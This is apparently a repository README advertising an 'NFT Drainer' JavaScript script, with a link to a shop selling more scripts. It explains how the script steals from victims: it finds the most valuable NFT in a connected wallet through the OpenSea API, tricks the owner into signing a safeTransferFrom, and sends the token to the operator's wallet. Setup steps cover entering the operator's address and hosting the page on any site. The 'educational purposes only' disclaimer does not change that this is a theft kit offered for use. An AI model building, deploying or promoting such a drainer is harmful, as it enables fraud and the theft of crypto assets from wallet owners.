
This script will transfer NFT to your wallet with method safeTransferfrom. The code is fully clean and not obfuscated!

Primary LanguageJavaScript

NFT Drainer/steal/grab with method safeTransferfrom!

This script will transfer NFT to your wallet with method safeTransferfrom. The code is fully clean and not obfuscated! (I'm responsible for my words!)

Start Script ⚠️ Educational purposes only. Other scripts are available in the store https://webswap.sellix.io/

💡 How does it work?

The victim connects the wallet => is checked for NFT via api opensea => the most expensive nft will be requested for signature => After Signature NFT on your wallet


Open file js/main.js and on line 1 insert your eth wallet

const ownerAddress = '';

Install on hosting and everything is ready! This is a script and an example of its use, on any site you can install this script.


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